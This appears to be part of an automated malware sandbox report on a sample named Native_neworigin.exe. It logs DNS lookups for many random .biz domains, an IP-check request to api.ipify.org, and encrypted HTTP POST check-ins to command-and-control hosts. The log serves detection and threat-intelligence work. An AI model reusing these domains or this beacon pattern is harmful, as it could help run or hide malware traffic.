                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.228964090 CET1.1.1.1192.168.2.100x4ebaNo error (0)cpclnad.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.479105949 CET1.1.1.1192.168.2.100x5ae0No error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:28.911560059 CET1.1.1.1192.168.2.100x16d1No error (0)mjheo.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.324650049 CET1.1.1.1192.168.2.100x4a83No error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:29.616755962 CET1.1.1.1192.168.2.100x941No error (0)wluwplyh.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:30.821866035 CET1.1.1.1192.168.2.100x568No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.095278978 CET1.1.1.1192.168.2.100xaad7No error (0)zgapiej.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:31.786019087 CET1.1.1.1192.168.2.100xf15No error (0)jifai.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.322005033 CET1.1.1.1192.168.2.100xf439No error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:32.485907078 CET1.1.1.1192.168.2.100x5c88No error (0)xnxvnn.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.018537045 CET1.1.1.1192.168.2.100x8ff2No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.726933956 CET1.1.1.1192.168.2.100x56abNo error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:33.954818010 CET1.1.1.1192.168.2.100x8139No error (0)ihcnogskt.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.585393906 CET1.1.1.1192.168.2.100x2ef2No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:34.808111906 CET1.1.1.1192.168.2.100x7bffNo error (0)kkqypycm.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.362144947 CET1.1.1.1192.168.2.100x7164No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:35.362160921 CET1.1.1.1192.168.2.100x7164No error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.224489927 CET1.1.1.1192.168.2.100x85eaNo error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:36.281366110 CET1.1.1.1192.168.2.100xa639No error (0)uevrpr.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.204818010 CET1.1.1.1192.168.2.100x5319No error (0)fgajqjyhr.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:37.960114002 CET1.1.1.1192.168.2.100xd3f3No error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.253853083 CET1.1.1.1192.168.2.100x66dcNo error (0)hagujcj.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.815114021 CET1.1.1.1192.168.2.100xacf3No error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:38.954540968 CET1.1.1.1192.168.2.100x8841No error (0)sctmku.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:39.889638901 CET1.1.1.1192.168.2.100x797dNo error (0)qcrsp.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.303442001 CET1.1.1.1192.168.2.100x8ac9No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:40.867240906 CET1.1.1.1192.168.2.100x83cfNo error (0)sewlqwcd.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.393363953 CET1.1.1.1192.168.2.100xb3c3No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.393393993 CET1.1.1.1192.168.2.100xb3c3No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:41.549961090 CET1.1.1.1192.168.2.100xbb55No error (0)dyjdrp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.390134096 CET1.1.1.1192.168.2.100x58cNo error (0)napws.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:42.975738049 CET1.1.1.1192.168.2.100x8d32No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:43.243745089 CET1.1.1.1192.168.2.100xbddfNo error (0)qvuhsaqa.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.087251902 CET1.1.1.1192.168.2.100x922fNo error (0)apzzls.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:44.500591993 CET1.1.1.1192.168.2.100x2f6bNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.215684891 CET1.1.1.1192.168.2.100xd8bbNo error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.215711117 CET1.1.1.1192.168.2.100xd8bbNo error (0)krnsmlmvd.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.221208096 CET1.1.1.1192.168.2.100xb5f2No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:45.221208096 CET1.1.1.1192.168.2.100xb5f2No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.714639902 CET1.1.1.1192.168.2.100x9204No error (0)nlscndwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.808634996 CET1.1.1.1192.168.2.100xb74cName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:46.816709995 CET1.1.1.1192.168.2.100xfd4eNo error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:47.579643011 CET1.1.1.1192.168.2.100xfd4cNo error (0)bzkysubds.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.287154913 CET1.1.1.1192.168.2.100xa897No error (0)ltpqsnu.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.947391033 CET1.1.1.1192.168.2.100x4e7Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.957375050 CET1.1.1.1192.168.2.100x7ffbName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:48.969521999 CET1.1.1.1192.168.2.100xde5No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.020674944 CET1.1.1.1192.168.2.100x5ef7No error (0)vnvbt.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:49.927092075 CET1.1.1.1192.168.2.100x1e31No error (0)ypituyqsq.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:50.614737034 CET1.1.1.1192.168.2.100x658aNo error (0)ijnmvqa.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:51.480401039 CET1.1.1.1192.168.2.100x89abNo error (0)tltxn.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.275578976 CET1.1.1.1192.168.2.100x9b7aNo error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:52.276009083 CET1.1.1.1192.168.2.100x9b7aNo error (0)vgypotwp.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.129270077 CET1.1.1.1192.168.2.100xe1dNo error (0)giliplg.biz18.246.231.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:53.981697083 CET1.1.1.1192.168.2.100x8498No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:54.842189074 CET1.1.1.1192.168.2.100x1b85No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:56.316534042 CET1.1.1.1192.168.2.100xb4f1No error (0)cvgrf.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.177561998 CET1.1.1.1192.168.2.100x4d5aNo error (0)npukfztj.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.866249084 CET1.1.1.1192.168.2.100x6bc4No error (0)przvgke.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:57.866249084 CET1.1.1.1192.168.2.100x6bc4No error (0)przvgke.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.214648962 CET1.1.1.1192.168.2.100x470aName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.222657919 CET1.1.1.1192.168.2.100xf990No error (0)knjghuig.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:59.947098017 CET1.1.1.1192.168.2.100xa28No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.701354027 CET1.1.1.1192.168.2.100xbb2Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.712205887 CET1.1.1.1192.168.2.100x2a3eName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:00.719713926 CET1.1.1.1192.168.2.100x45e4No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:11.941885948 CET1.1.1.1192.168.2.100x795cNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:13.442914963 CET1.1.1.1192.168.2.100xa413No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021334887 CET1.1.1.1192.168.2.100xee63No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.021348953 CET1.1.1.1192.168.2.100xee63No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:15.731262922 CET1.1.1.1192.168.2.100x6992No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET1.1.1.1192.168.2.100x35faNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.219975948 CET1.1.1.1192.168.2.100x35faNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:01:17.718348026 CET1.1.1.1192.168.2.100xb9d5No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • gxe0.com
                                                                                                                                                                                                                                                                                                                                                                                                                                        • api.ipify.org
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xlfhhhm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ifsaia.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • tbjrpv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • deoci.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gytujflc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wllvnzb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ftxlah.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • rynmcq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • uaafd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • reczwga.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • bghjpy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • damcprvgv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ocsvqjg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ywffr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pectx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zyiexezl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • banwyw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kvbjaur.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • uphca.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • fjumtfnz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • hlzfuyy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • rffxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cikivjto.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qncdaagct.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • shpwbsrw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cjvgcl.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • neazudmrq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • pgfsvwx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • aatcwo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kcyvxytog.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • nwdnxrd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ereplfx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ptrim.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • znwbniskf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • cpclnad.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • mjheo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wluwplyh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • zgapiej.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • jifai.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • xnxvnn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ihcnogskt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • kkqypycm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • uevrpr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • fgajqjyhr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • hagujcj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • sctmku.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qcrsp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • sewlqwcd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • dyjdrp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • napws.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • qvuhsaqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • apzzls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • krnsmlmvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        • giliplg.biz

                                                                                                                                                                                                                                                                                                                                                                                                                                        HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        0192.168.2.104980154.244.188.177807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.724061012 CET353OUTPOST /nkrerhrn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:28.724087954 CET836OUTData Raw: f8 1c 8a 5f 73 b0 fd b8 38 03 00 00 5f f8 a4 7f 96 82 b0 97 20 c2 45 8d e0 dc 89 8e ba 69 78 3e 29 8e 04 57 7c 83 7c f6 f9 c3 8a e8 50 97 1c ce 36 3d 12 81 c1 37 ad ae c1 a2 6d 43 e4 c0 de 4c 3a 32 b6 e9 10 fa 0d 1e c8 20 d1 86 12 2a 47 72 7f f4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _s8_ Eix>)W||P6=7mCL:2 *Gr9(o*?qY3 o9mznj,-AG^)7_?g7;@16.VOj8gM$9wt]Kq3:Rgp&=Qa
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:29.568247080 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:57:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=81f90664e47072629625179d702375cd|155.94.241.187|1731920249|1731920249|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        1192.168.2.104981318.141.10.107807256C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:31.452289104 CET345OUTPOST /iu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ssbzmoy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:31.452866077 CET836OUTData Raw: c6 a4 fb 4d c3 ce 55 fb 38 03 00 00 e8 20 61 19 a7 4b dc 99 45 91 01 bb 9e 98 e2 1e 82 22 f2 ce 99 55 fd ec b1 eb 90 60 89 75 ce 2e f3 a9 39 86 0b 83 db 54 07 74 84 2b 2a 37 a3 be fa 50 1a db 40 f1 b0 7a 52 51 5d 39 94 e8 39 e2 5e 19 ef ae 6d cf
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: MU8 aKE"U`u.9Tt+*7P@zRQ]99^mRD1~sI*r\N-84.:B2DPPeUz5\[Tq-sm`d\1:\bz8"IX8ph0[N;[KWUzIyc
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:32.866704941 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
